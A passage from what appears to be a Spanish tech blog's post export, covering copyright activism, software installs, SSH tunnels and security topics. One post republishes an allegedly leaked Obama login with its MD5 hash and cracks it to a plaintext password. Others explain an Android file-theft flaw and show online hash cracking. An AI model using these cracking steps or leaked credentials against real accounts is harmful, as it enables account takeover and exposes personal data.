adaptarse a una industria más justa\u0026rdquo;\nAyúdenme a completar la lista en los comentarios. Copiad el texto en otras fuentes. Compartid por email con vuestros contactos¦\n","permalink":"http://karpoke.ignaciocano.com/2012/01/11/compartecultura/","summary":"\u003cp\u003e\u003cstrong\u003eLa recopilación de la lista original de #ComparteCultura es obra de\n@kurioso y está en \u003ca href=\"http://kurioso.es/2012/01/09/compartecultura/\"\u003e#ComparteCultura\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eEn 1980 la industria discográfica británica realizó una campaña\nantipiratería con el slogan \u0026ldquo;\u003cem\u003e\u003ca href=\"http://en.wikipedia.org/wiki/Home_Taping_Is_Killing_Music\"\u003eHome Taping Is Killing Music\u003c/a\u003e\u003c/em\u003e\u0026rdquo;. 30\naños más tarde \u003ca href=\"http://www.enriquedans.com/2011/03/mas-evidencias-la-musica-esta-mas-viva-que-nunca.html\"\u003ela música está más viva que nunca\u003c/a\u003e y lo que está\nmuriendo es la industria, que reclama el \u0026rsquo;lucro cesante\u0026rsquo; de un negocio\nde intermediación descaradamente obsoleto. Hay que meterse en la cabeza:\n\u003ca href=\"http://www.filmica.com/david_bravo/archivos/005799.html\"\u003eCompartir no es delito\u003c/a\u003e. \u003ca href=\"http://www.elpais.com/articulo/tecnologia/Nuevo/carpetazo/caso/web/enlaces/elpeputec/20100603elpeputec_4/Tes\"\u003eDescargar no es delito\u003c/a\u003e. \u003ca href=\"http://mangasverdes.es/2010/01/10/copiar-no-es-robar/\"\u003eCopiar no es\nrobar\u003c/a\u003e. La industria quiere meterte miedo. ¿Cómo podemos ejercer\nnuestros derechos? \u003cstrong\u003eComparte, descarga y copia la siguiente lista\u003c/strong\u003e de\nrecursos culturales.\u003c/p\u003e","title":"#ComparteCultura"},{"content":"MySQL Workbench es una herramienta que permite diseñar y administrar una base de datos MySQL y proporciona herramientas para la configuración del servidor y la administración de los usuarios.\nMySQL Workbench no se encuentra en los repositorios de Ubuntu, y desde la página de descargas todavía no hay un paquete para Ubuntu Oneiric Ocelot (11.10).\nInstalación Para instalar MySQL Workbench, primero nos bajamos el código fuente. Ahora mismo, la última versión es la 5.2.37.\n$ wget http://dev.mysql.com/get/Downloads/MySQLGUITools/mysql-workbench-gpl-5.2.37-src.tar.gz/from/ftp://ftp.inria.fr/pub/MySQL/ Comprobamos el fichero:\n$ md5sum mysql-workbench-gpl-5.2.37-src.tar.gz c7301f078834512538353ee3ce2cf460 mysql-workbench-gpl-5.2.37-src.tar.gz Los descomprimimos:\n$ tar xvzf mysql-workbench-gpl-5.2.37-src.tar.gz $ cd mysql-workbench-gpl-5.2.37-src Configuramos el paquete:\n$ ./configure Esto, además de configurar el paquete, nos avisará de cualquier dependencia requerida que no tengamos instalada. En este caso:\n$ sudo aptitude install libzip-dev libgtkmm-2.4-dev libsqlite3-dev uuid-dev liblua5.1-0-dev libctemplate-dev Una vez terminado sin errores, ya podemos compilar:\n$ make Antes de instalarlo, podemos realizar una comprobación:\n$ make check Y ya podemos instalarlo:\n$ sudo make install ","permalink":"http://karpoke.ignaciocano.com/2012/01/10/instalando-mysql-workbench-desde-el-codigo-fuente-en-ubuntu-oneiric-ocelot/","summary":"\u003cp\u003e\u003ca href=\"http://www.mysql.com/products/workbench/\"\u003eMySQL Workbench\u003c/a\u003e es una herramienta que permite diseñar y administrar\nuna base de datos MySQL y proporciona herramientas para la configuración\ndel servidor y la administración de los usuarios.\u003c/p\u003e\n\u003cp\u003eMySQL Workbench no se encuentra en los repositorios de Ubuntu, y desde\nla \u003ca href=\"http://dev.mysql.com/downloads/workbench#downloads\"\u003epágina de descargas\u003c/a\u003e todavía no hay un paquete para Ubuntu Oneiric\nOcelot (11.10).\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePara instalar MySQL Workbench, primero nos bajamos el código fuente.\nAhora mismo, la última versión es la 5.2.37.\u003c/p\u003e","title":"Instalando MySQL Workbench desde el código fuente en Ubuntu Oneiric Ocelot"},{"content":"La red resiste.\nHace exactamente dos años tuvimos conocimiento del anteproyecto de Ley Sinde. Gran parte de la ciudadanía señaló de inmediato su rechazo en las redes a través del #manifiesto por los derechos fundamentales en Internet. En estos 24 meses el debate social sobre esta iniciativa ha sido intenso y ha aglutinado a ciudadanos y organizaciones preocupados por la merma de derechos y libertades. Ahora, pocos días después de haber sido deslegitimado por las urnas, un gobierno moribundo pretende aprobar el reglamento que desarrolla esta ley en abierta connivencia con el gobierno entrante.\nLa Ley Sinde tendrá numerosos efectos indeseados: al introducir una fuerte inseguridad jurídica en la regulación de Internet, se dificulta gravemente la actividad de los emprendedores tecnológicos que el Partido Popular pretende que contribuyan a reactivar la economía. La redacción de la Ley Sinde señala claramente que se aplica a todos los servicios de la sociedad de la información; no deben confundirnos los mensajes que afirman que su única razón es la de cerrar webs de descargas. Nada es peor para el crecimiento de un mercado que la inseguridad de no saber si al día siguiente un negocio puede ser cerrado por la aplicación arbitraria de una norma en manos del gobierno de turno.\nEl panorama de la propiedad intelectual en nuestro país es atroz: la Embajada de los Estados Unidos ha impuesto la aprobación de la Ley Sinde, el canon digital a empresas y administraciones fue declarado ilegal por el Tribunal de Justicia de la Unión Europea pero tras año y medio se sigue pagando, los antiguos dirigentes de la SGAE -siempre defendida por el Ministerio de Cultura- se hallan imputados en la Audiencia Nacional por el saqueo generalizado del dinero de los autores. Este panorama cuadra con el general: una corrupción política extendida y no censurada en las urnas, unida a la subordinación de la democracia a los intereses de unos pocos con nombres y apellidos a los que sin embargo se les llama \u0026ldquo;mercados\u0026rdquo;.\nSólo con inteligencia, diálogo y trabajo se pueden resolver los actuales retos de la propiedad intelectual y comenzar a construir una salida a la preocupante situación económica actual. Como el Tribunal Europeo de Justicia, entendemos que la tensión entre la propiedad intelectual y la libertad de empresa, el derecho a la privacidad y el derecho a recibir o emitir información ha de resolverse en favor de estos tres últimos derechos. Será la única manera de crear riqueza y de mantener las libertades que tanto ha costado conseguir.\nFrente a la arbitrariedad, la defensa histórica de la ciudadanía ha consistido en asegurar la garantía de los derechos fundamentales sustrayéndolos de la política, esto es, de los poderes de la mayoría y del mercado: se trata de derechos inviolables, indisponibles e inalienables.\nLos gobiernos van y vienen. La red resiste.\n","permalink":"http://karpoke.ignaciocano.com/2011/12/02/la-red-resiste/","summary":"\u003cp\u003e\u003ca href=\"http://redresiste.net/\"\u003eLa red resiste\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eHace exactamente dos años tuvimos conocimiento del anteproyecto de Ley\nSinde. Gran parte de la ciudadanía señaló de inmediato su rechazo en las\nredes a través del #\u003ca href=\"http://es.wikipedia.org/wiki/Manifiesto_%C2%ABEn_defensa_de_los_derechos_fundamentales_en_internet%C2%BB\"\u003emanifiesto por los derechos fundamentales en\nInternet\u003c/a\u003e. En estos 24 meses el debate social sobre esta iniciativa ha\nsido intenso y ha aglutinado a ciudadanos y organizaciones preocupados\npor la merma de derechos y libertades. Ahora, pocos días después de\nhaber sido deslegitimado por las urnas, un gobierno moribundo pretende\naprobar el reglamento que desarrolla esta ley en abierta connivencia con\nel gobierno entrante.\u003c/p\u003e","title":"La red resiste"},{"content":"En un tweet de @AnonNewsSource han publicado el usuario y el hash de la contraseña de Obama:\nObama WEB http://whitehouse.gov barack.obama@whitehouse.gov / PASS: 6289c5975815012768aefbf9a8d2fd3e / LOGIN: bobama PHONE +1 202-456-1111\nPodemos utilizar el script findmyhash.py para ver si encuentra la contraseña asociada a ese hash:\n$ python findmyhash.py md5 -h \u0026#34;6289c5975815012768aefbf9a8d2fd3e\u0026#34; -g Cracking hash: 6289c5975815012768aefbf9a8d2fd3e Analyzing with joomlaaa (http://joomlaaa.com)... ... hash not found in joomlaaa Analyzing with md5-lookup (http://md5-lookup.com)... ... hash not found in md5-lookup Analyzing with md5.com.cn (http://md5.com.cn)... __*** HASH CRACKED!! ***__ The original string is: 80412999 The following hashes were cracked: ---------------------------------- 6289c5975815012768aefbf9a8d2fd3e -\u0026gt; 80412999 Via segu-info.com.ar\n","permalink":"http://karpoke.ignaciocano.com/2011/12/01/la-contrasena-del-presidente-obama/","summary":"\u003cp\u003eEn un \u003cem\u003etweet\u003c/em\u003e de \u003ca href=\"http://twitter.com/#!/AnonNewsSource/status/141733919501467649\"\u003e@AnonNewsSource\u003c/a\u003e han publicado el usuario y el\n\u003cem\u003ehash\u003c/em\u003e de la contraseña de Obama:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eObama WEB \u003ca href=\"http://whitehouse.gov\"\u003ehttp://whitehouse.gov\u003c/a\u003e \u003ca href=\"mailto:barack.obama@whitehouse.gov\"\u003ebarack.obama@whitehouse.gov\u003c/a\u003e / PASS:\n6289c5975815012768aefbf9a8d2fd3e / LOGIN: bobama PHONE +1 202-456-1111\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003ePodemos utilizar el \u003cem\u003escript\u003c/em\u003e \u003ca href=\"/2011/09/30/encuentra-el-hash/\"\u003efindmyhash.py\u003c/a\u003e para ver si encuentra la\ncontraseña asociada a ese \u003cem\u003ehash\u003c/em\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ python findmyhash.py md5 -h \u0026#34;6289c5975815012768aefbf9a8d2fd3e\u0026#34; -g\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eCracking hash: 6289c5975815012768aefbf9a8d2fd3e\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAnalyzing with joomlaaa (http://joomlaaa.com)...\n... hash not found in joomlaaa\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAnalyzing with md5-lookup (http://md5-lookup.com)...\n... hash not found in md5-lookup\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAnalyzing with md5.com.cn (http://md5.com.cn)...\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e__*** HASH CRACKED!! ***__\nThe original string is: 80412999\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eThe following hashes were cracked:\n----------------------------------\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e6289c5975815012768aefbf9a8d2fd3e -\u0026gt; 80412999\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eVia \u003ca href=\"http://blog.segu-info.com.ar/2011/12/usuario-y-contrasena-de-barack-obama.html\"\u003esegu-info.com.ar\u003c/a\u003e\u003c/p\u003e","title":"La contraseña del presidente Obama"},{"content":"Hoy se ha hecho pública la prueba de concepto de Thomas Cannon que permite obtener ficheros de los dispositivos con Android con versiones anteriores a la 2.3.4.\nEn la demostración se ha utilizado un HTC Desire (UK version) con Android 2.2. Yo lo he probado con un HTC Wildfire con Android 2.2.1 y también funciona.\nLa vulnerabilidad permite que un sitio malicioso obtenga cualquier fichero guardado en la tarjeta SD, e incluso algunos ficheros e información guardados en el teléfono. No se puede acceder a ficheros del sistema, ya que se ejecuta dentro de la sandbox.\nEl navegador de Android no pide confirmación al usuario para descargar el fichero, por ejemplo poc.html, y lo descarga de forma automática en el directorio /sdcard/download/poc.html. Mediante javascript es posible abrir automáticamente el fichero descargado, forzando al navegador a enviar los ficheros locales, sin pedir confirmación al usuario.\nEl principal impedimento es que el atacante debe conocer la ruta y el nombre de los ficheros que quiere obtener. Sin embargo, algunas aplicaciones utilizan nombres concretos para guardar sus ficheros en la tarjeta SD o nombres que siguen una pauta concreta.\nUn ejemplo del resultado de la prueba de concepto es el siguiente:\nArray ( [filename0] =\u0026gt; L3Byb2MvdmVyc2lvbg== [data0] =\u0026gt; TGludXggdmVyc2lvbiAyLjYuMzIuMjEtZzZjNTVlZTQgKGh0Yy1rZXJuZWxAYW5kMTgtMikgKGdjYyB2ZXJzaW9uIDQuNC4wIChHQ0MpICkgIzEgUFJFRU1QVCBUaHUgRGVjIDIgMTY6NTk6MjcgQ1NUIDIwMTAK ) El contenido está en base 64. Si lo decodificamos:\n$ base64 -d \u0026lt;\u0026lt;\u0026lt; \u0026#34;L3Byb2MvdmVyc2lvbg==\u0026#34; /proc/version $ base64 -d \u0026lt;\u0026lt;\u0026lt; \u0026#34;TGludXggdmVyc2lvbiAyLjYuMzIuMjEtZzZjNTVlZTQgKGh0Yy1rZXJuZWxAYW5kMTgtMikgKGdjYyB2ZXJzaW9uIDQuNC4wIChHQ0MpICkgIzEgUFJFRU1QVCBUaHUgRGVjIDIgMTY6NTk6MjcgQ1NUIDIwMTAK\u0026#34; Linux version 2.6.32.21-g6c55ee4 (htc-kernel@and18-2) (gcc version 4.4.0 (GCC) ) #1 PREEMPT Thu Dec 2 16:59:27 CST 2010 Referencias Via @hackplayers Prueba de concepto en exploit-db.com Blog de Thomas Cannon\n","permalink":"http://karpoke.ignaciocano.com/2011/11/28/obtencion-remota-de-ficheros-en-android-2-3-4/","summary":"\u003cp\u003eHoy se ha hecho pública la \u003ca href=\"http://www.exploit-db.com/exploits/18164/\"\u003eprueba de concepto\u003c/a\u003e de Thomas Cannon que\npermite \u003ca href=\"http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/\"\u003eobtener ficheros de los dispositivos con Android\u003c/a\u003e con versiones\nanteriores a la 2.3.4.\u003c/p\u003e\n\u003cp\u003eEn la demostración se ha utilizado un HTC Desire (UK version) con\nAndroid 2.2. Yo lo he probado con un HTC Wildfire con Android 2.2.1 y\ntambién funciona.\u003c/p\u003e\n\u003cp\u003eLa vulnerabilidad permite que un sitio malicioso obtenga cualquier\nfichero guardado en la tarjeta SD, e incluso algunos ficheros e\ninformación guardados en el teléfono. No se puede acceder a ficheros del\nsistema, ya que se ejecuta dentro de la \u003cem\u003esandbox\u003c/em\u003e.\u003c/p\u003e","title":"Obtención remota de ficheros en Android \u003c 2.3.4"},{"content":"TLSSLed es un script cuya finalidad es evaluar la seguridad de SSL/TLS de un servidor web. Se basa en el escáner de SSL/TLS, sslscan, el cual a su vez se basa en la librería openssl, y en el comando openssl s_client. Entre las comprobaciones que realiza se incluyen comprobar si el servidor soporta SSLv2, cifrado NULL, cifrados débiles por la longitud de su clave (40 ó 56 bits), la disponibilidad de cifrados fuertes, como AES, si el certificado está firmado con MD5 y si permite la renegociación de SSL/TLS.\n(Ya está disponible la versión 1.3)\nUn ejemplo de uso:\n$ TLSSLed_v1.2.sh 127.0.0.1 443 ------------------------------------------------------ TLSSLed - (1.2) based on sslscan and openssl by Raul Siles (www.taddong.com) ------------------------------------------------------ + openssl version: OpenSSL 1.0.0e 6 Sep 2011 + sslscan version 1.8.2 ------------------------------------------------------ [-] Analyzing SSL/TLS on 127.0.0.1:443 .. [*] The target service 127.0.0.1:443 seems to speak SSL/TLS... [-] Running sslscan on 127.0.0.1:443... [*] Testing for SSLv2 ... [*] Testing for NULL cipher ... [*] Testing for weak ciphers (based on key length) ... [*] Testing for strong ciphers (AES) ... Accepted SSLv3 256 bits DHE-RSA-AES256-SHA Accepted SSLv3 256 bits AES256-SHA Accepted SSLv3 128 bits DHE-RSA-AES128-SHA Accepted SSLv3 128 bits AES128-SHA Accepted TLSv1 256 bits DHE-RSA-AES256-SHA Accepted TLSv1 256 bits AES256-SHA Accepted TLSv1 128 bits DHE-RSA-AES128-SHA Accepted TLSv1 128 bits AES128-SHA [*] Testing for MD5 signed certificate ... [*] Testing for certificate public key length ... RSA Public Key: (2048 bit) [*] Testing for certificate subject ... Subject: /C=ES/ST=IB/L=Palma de Mallorca/O=Localhost/CN=Localhost/emailAddress=karpoke@localhost [*] Testing for certificate CA issuer ... Issuer: /C=ES/ST=IB/O=Localhost CA/CN=Localhost/emailAddress=karpoke@localhost [*] Testing for certificate validity period ... Today: dom oct 23 13:21:35 UTC 2011 Not valid before: Jun 14 11:26:10 2011 GMT Not valid after: Jun 13 11:26:10 2012 GMT [*] Checking preferred server ciphers ... Prefered Server Cipher(s): SSLv3 256 bits DHE-RSA-AES256-SHA TLSv1 256 bits DHE-RSA-AES256-SHA [-] Testing for SSLv3/TLSv1 renegotiation vuln. (CVE-2009-3555) ... [*] Testing for secure renegotiation ... Secure Renegotiation IS supported [-] Testing for TLS v1.1 and v1.2 (CVE-2011-3389 aka BEAST) ... [*] Testing for SSLv3 and TLSv1 support first ... Accepted SSLv3 256 bits DHE-RSA-AES256-SHA Accepted SSLv3 256 bits AES256-SHA Accepted SSLv3 168 bits EDH-RSA-DES-CBC3-SHA Accepted SSLv3 168 bits DES-CBC3-SHA Accepted SSLv3 128 bits DHE-RSA-AES128-SHA Accepted SSLv3 128 bits AES128-SHA Accepted SSLv3 128 bits RC4-SHA Accepted SSLv3 128 bits RC4-MD5 Accepted TLSv1 256 bits DHE-RSA-AES256-SHA Accepted TLSv1 256 bits AES256-SHA Accepted TLSv1 168 bits EDH-RSA-DES-CBC3-SHA Accepted TLSv1 168 bits DES-CBC3-SHA Accepted TLSv1 128 bits DHE-RSA-AES128-SHA Accepted TLSv1 128 bits AES128-SHA Accepted TLSv1 128 bits RC4-SHA Accepted TLSv1 128 bits RC4-MD5 [*] Testing for TLS v1.1 support ... The local openssl version does NOT support TLS v1.1 [*] Testing for TLS v1.2 support ... The local openssl version does NOT support TLS v1.2 [-] Testing for SSL/TLS HTTPS security headers ... [*] Testing for Strict-Transport-Security (STS) header ... [*] Testing for cookies with the secure flag ... [*] Testing for cookies without the secure flag ... [-] New files created: -rw-rw-r-- 1 karpoke karpoke 9223 2011-10-23 15:21 sslscan_127.0.0.1_443_2011-10-23_151957.log -rw-rw-r-- 1 karpoke karpoke 2796 2011-10-23 15:21 openssl_HEAD_127.0.0.1_443_2011-10-23_151957.log -rw-rw-r-- 1 karpoke karpoke 2511 2011-10-23 15:19 openssl_RENEG_127.0.0.1_443_2011-10-23_151957.log -rw-rw-r-- 1 karpoke karpoke 688 2011-10-23 15:19 openssl_RENEG_127.0.0.1_443_2011-10-23_151957.err -rw-rw-r-- 1 karpoke karpoke 582 2011-10-23 15:21 openssl_HEAD_127.0.0.1_443_2011-10-23_151957.err [-] done Via L’home dibuixat.\n","permalink":"http://karpoke.ignaciocano.com/2011/10/23/tlssled-v1-2/","summary":"\u003cp\u003e\u003ca href=\"http://www.taddong.com/en/lab.html#TLSSLED\"\u003eTLSSLed\u003c/a\u003e es un \u003cem\u003escript\u003c/em\u003e cuya finalidad es evaluar la seguridad de\nSSL/TLS de un servidor web. Se basa en el escáner de SSL/TLS, \u003ccode\u003esslscan\u003c/code\u003e,\nel cual a su vez se basa en la librería \u003ccode\u003eopenssl\u003c/code\u003e, y en el comando\nopenssl s_client. Entre las comprobaciones que realiza se incluyen\ncomprobar si el servidor soporta SSLv2, cifrado NULL, cifrados débiles\npor la longitud de su clave (40 ó 56 bits), la disponibilidad de\ncifrados fuertes, como AES, si el certificado está firmado con MD5 y si\npermite la renegociación de SSL/TLS.\u003c/p\u003e","title":"TLSSLed v1.2"},{"content":"Si queremos seguir las actualizaciones de una página de Facebook, no tenemos más que copiar el ID de la página y sustituirlo en la siguiente URL, en este caso en formato Atom 1.0:\nhttp://www.facebook.com/feeds/page.php?format=atom10\u0026amp;id=xxxxxxxxxxxx O la siguiente, para usar el formato RSS 2.0:\nhttp://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=xxxxxxxxxxxx Por ejemplo, para añadir el RSS de la página de Amstrad ESP, http://www.facebook.com/pages/Amstrad-ESP/72227918057, no tenemos más que utilizar la siguiente URL:\n[http://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=72227918057][]\n[http://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=72227918057]:\nhttp://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=72227918057 \u0026#34;Amstrad ESP. Facebook Page RSS\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/10/10/facebook-y-el-rss-de-las-paginas/","summary":"\u003cp\u003eSi queremos \u003ca href=\"http://rubenbaston.org/rss-paginas-facebook/\"\u003eseguir las actualizaciones de una página de Facebook\u003c/a\u003e, no\ntenemos más que copiar el ID de la página y sustituirlo en la siguiente\nURL, en este caso en formato Atom 1.0:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehttp://www.facebook.com/feeds/page.php?format=atom10\u0026amp;id=xxxxxxxxxxxx\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eO la siguiente, para usar el formato RSS 2.0:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehttp://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=xxxxxxxxxxxx\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePor ejemplo, para añadir el RSS de la página de Amstrad ESP,\n\u003ca href=\"http://www.facebook.com/pages/Amstrad-ESP/72227918057\"\u003ehttp://www.facebook.com/pages/Amstrad-ESP/\u003cstrong\u003e72227918057\u003c/strong\u003e\u003c/a\u003e, no\ntenemos más que utilizar la siguiente URL:\u003c/p\u003e\n\u003cp\u003e[http://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=\u003cstrong\u003e72227918057\u003c/strong\u003e][]\u003c/p\u003e\n\u003cp\u003e[http://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=\u003cstrong\u003e72227918057\u003c/strong\u003e]:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehttp://www.facebook.com/feeds/page.php?format=rss20\u0026amp;id=72227918057\n\u0026#34;Amstrad ESP. Facebook Page RSS\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e","title":"Facebook y el RSS de las páginas"},{"content":"Con las últimas versiones del kernel el consumo de la batería se había disparado, reduciendo el tiempo de vida útil de la batería. Las baterías son un bien preciado, por lo que existen multitud de trucos para intentar alargar su tiempo de vida.\nAunque no se conoce con certeza si este elevado consumo podría deberse a un fallo, en los casos en que la BIOS indicaba que ASPM no estaba soportado estando éste habilitado, o a la configuración en algunos parámetros del kernel.\nConfiguración del kernel Entre estos parámetros se encuentran:\ndirty_writeback_centisecs, que indica las centésimas entre despertares de `pdflush` para escribir datos en disco y tiene un valor por defecto de 500, lo cual es óptimo para el rendimiento pero no para la vida de la batería. El parámetro no cambia automáticamente cuando desconectamos el portátil de la corriente. nmi_watchdog, sirve para generar [interrupciones no enmascarables][] (NMI). Se puede utilizar para depurar el _kernel_. Ejecutando NMI periódicas, el _kernel_ puede monitorizar _locks_ en cualquier CPU. sched_smt_power_savings, se utiliza para [controlar la potencia de la CPU][]. Bajo condiciones de poca carga, y si la política de ahorro energético está habilitada, el planificador minimiza el número de núcleos que ejecutan dicha carga, ahorrando energía a costa del rendimiento. snd_hda_intel/parameters/power_save, especifica el número de segundos tras los cuales el [módulo de sonido][] se deshabilita. $ cat /sys/module/snd_hda_intel/parameters/power_save 0 ","permalink":"http://karpoke.ignaciocano.com/2011/10/01/el-consumo-de-la-bateria/","summary":"\u003cp\u003eCon las últimas versiones del \u003cem\u003ekernel\u003c/em\u003e el \u003ca href=\"http://www.phoronix.com/scan.php?page=article\u0026amp;item=linux_mobile_uffda#=1\"\u003econsumo de la batería se\nhabía disparado\u003c/a\u003e, reduciendo el tiempo de vida útil de la batería. Las\nbaterías son un bien preciado, por lo que existen multitud de trucos\npara intentar \u003ca href=\"/2010/09/26/la-bateria-del-portatil/\"\u003ealargar su tiempo de vida\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eAunque no se conoce con certeza si \u003ca href=\"http://elsoftwarelibre.wordpress.com/2011/09/29/el-elevado-consumo-de-energia-de-las-ultimas-versiones-del-kernel-de-linux-%C2%BFverdad-o-mito/\"\u003eeste elevado consumo podría deberse\na un fallo\u003c/a\u003e, en los casos en que la BIOS indicaba que ASPM no estaba\nsoportado estando éste habilitado, o a la configuración en algunos\n\u003ca href=\"http://www.fewt.com/2011/09/about-kernel-30-power-regression-myth.html\"\u003eparámetros del \u003cem\u003ekernel\u003c/em\u003e\u003c/a\u003e.\u003c/p\u003e","title":"El consumo de la batería"},{"content":"El escenario es el siguiente. Tenemos un equipo remoto C detrás de un cortafuegos, router o similar, que no podemos configurar y no permite conexiones entrantes, de tal manera que el equipo es inaccesible desde el exterior de la red en la que está. Otro equipo A, el nuestro, también está detrás de un cortafuegos, en otra red, que tampoco podemos configurar y tampoco permite conexiones entrantes. La buena noticia es que tenemos un servidor remoto B en otra red diferente al que sí tenemos acceso por SSH desde el equipo remoto C y desde el nuestro (el A). Tanto el equipo remoto C como el servidor B tienen un servidor SSH corriendo.\nUna posible solución es abrir un túnel inverso del equipo C al servidor B, entonces desde nuestro equipo (el A) conectarnos al servidor B y de ahí al equipo remoto C.\nEl siguiente comando abre un túnel inverso desde el equipo C al servidor B, de tal manera que en el servidor B en el puerto 8000 se podrá iniciar una conexión que será redirigida al servidor SSH del equipo C:\nremoteC$ ssh -f -N -R 8000:localhost:22 userB@remoteB # remoteC:22 ---\u0026gt; remoteB:8000 hostA$ ssh userB@remoteB remoteB$ ssh -p8000 userC@localhost Estas dos últimas acciones se pueden combinar en una sola si utilizamos el argumento -t para utilizar el servidor SSH de B como servidor intermedio para acceder a C (a través de la redirección en el propio servidor B):\nremoteC$ ssh -f -N -R 8000:localhost:22 userB@remoteB # remoteC:22 ---\u0026gt; remoteB:8000 hostA$ ssh -t userB@remoteB ssh -p8000 localhost Otra forma es abrir un túnel desde nuestro equipo creando una redirección local al puerto del servidor B en el cual se ha creado, previamente, el túnel inverso al equipo remoto C. De esta forma bastará conectarnos a nuestro propio equipo para tener acceso al equipo remoto C:\nremoteC$ ssh -f -N -R 8000:localhost:22 userB@remoteB # remoteC:22 ---\u0026gt; remoteB:8000 hostA$ ssh -f -N -L 8001:localhost:8000 userB@remoteB # remoteB:8000 ---\u0026gt; hostA:8001 hostA$ ssh -p8000 userC@localhost Sería mejor que los usuarios para conectarnos al servidor B desde el equipo remoto C y desde el nuestro fuesen distintos:\nremoteC$ ssh -f -N -R 8000:localhost:22 user_1B@remoteB # remoteC:22 ---\u0026gt; remoteB:8000 hostA$ ssh -f -N -L 8001:localhost:8000 user_2B@remoteB # hostA:8001 \u0026lt; -- remoteB:8000 hostA$ ssh -p8000 userC@localhost Como último comentario, si vamos a utilizar este sistema para administrar equipos remotos, quizá sería interesante utilizar algún sistema de contraseñas de un solo uso en el servidor.\n","permalink":"http://karpoke.ignaciocano.com/2011/09/30/tunel-ssh-inverso/","summary":"\u003cp\u003eEl escenario es el siguiente. Tenemos un equipo remoto C detrás de un\ncortafuegos, \u003cem\u003erouter\u003c/em\u003e o similar, que no podemos configurar y no permite\nconexiones entrantes, de tal manera que el equipo es inaccesible desde\nel exterior de la red en la que está. Otro equipo A, el nuestro, también\nestá detrás de un cortafuegos, en otra red, que tampoco podemos\nconfigurar y tampoco permite conexiones entrantes. La buena noticia es\nque tenemos un servidor remoto B en otra red diferente al que sí tenemos\nacceso por SSH desde el equipo remoto C y desde el nuestro (el A). Tanto\nel equipo remoto C como el servidor B tienen un servidor SSH corriendo.\u003c/p\u003e","title":"Túnel SSH inverso"},{"content":"Existen herramientas que permiten romper un hash, aunque a veces puede ahorrar tiempo y recursos buscar si el hash ya ha sido encontrado. Ni siquiera hace falta una rainbow table.\nfindmyhash es un script escrito en Python que puede buscar diferentes tipos de hash en diferentes servicios de cracking online. Los algoritmos soportados son los siguientes:\nMD4 MD5 SHA1 SHA256 RMD160 MYSQL CISCO7 LM NTLM Un ejemplo sencillo. Si no encuentra el hash, también lo buscará en Google:\n$ hash=$(echo 123456 | md5sum | cut -f1 -d\u0026#34; \u0026#34;) $ echo $hash f447b20a7fcbf53a5d5be013ea0b15af $ ./findmyhash.py MD5 -h $hash -g [...] Analyzing with noisette.ch (http://md5.noisette.ch)... __*** HASH CRACKED!! ***__ The original string is: 123456 The following hashes were cracked: ---------------------------------- f447b20a7fcbf53a5d5be013ea0b15af -\u0026gt; 123456 Otro ejemplo, esta vez con las 20 contraseñas más utilizadas:\n$ HASH_FILE=$(mktemp) $ passwords=( 123456 12345 123456789 Password iloveyou princess rockyou 1234567 12345678 abc123 Nicole Daniel babygirl monkey Jessica Lovely michael Ashley 654321 Qwerty ) $ for p in ${passwords[*]}; do hash=$(echo $p | md5sum | cut -f1 -d\u0026#34; \u0026#34;) echo $hash \u0026gt;\u0026gt; $HASH_FILE done $ python findmyhash.py MD5 -f $HASH_FILE \u0026gt; hash_results.txt Después de un rato, casi una hora, ha sido capaz de encontrar 6 contraseñas:\n$ grep \u0026#34;The original string\u0026#34; hash_results.txt The original string is: 123456 The original string is: 12345 The original string is: 12345678 The original string is: abc123 The original string is: Jessica The original string is: michael La opción para buscar en Google, en caso de no encuentrar el hash en ninguno de esos servicios online, sólo está disponible si buscamos un único hash, así que modificaremos ligeramente el script anterior para que, en lugar de pasarle un fichero con los hashes, vayamos llamando al script de uno en uno:\n$ passwords=( 123456 12345 123456789 Password iloveyou princess rockyou 1234567 12345678 abc123 Nicole Daniel babygirl monkey Jessica Lovely michael Ashley 654321 Qwerty ) $ \u0026gt; hash_results.txt $ for p in ${passwords[*]}; do hash=$(echo $p | md5sum | cut -f1 -d\u0026#34; \u0026#34;) python findmyhash.py MD5 -h $hash -g \u0026gt;\u0026gt; hash_results.txt done La diferencia respecto al caso anterior es que, para los hashes que no ha encontrado en ningún servicio, realiza una búsqueda en Google y muestra los primeros enlaces. Por ejemplo, el hash para la contraseña 654321 no ha sido capaz de encontrarlo, pero la búsqueda en Google, entre otras, ha proporcionado la URL http://paste2.org/p/1360449, que sí la 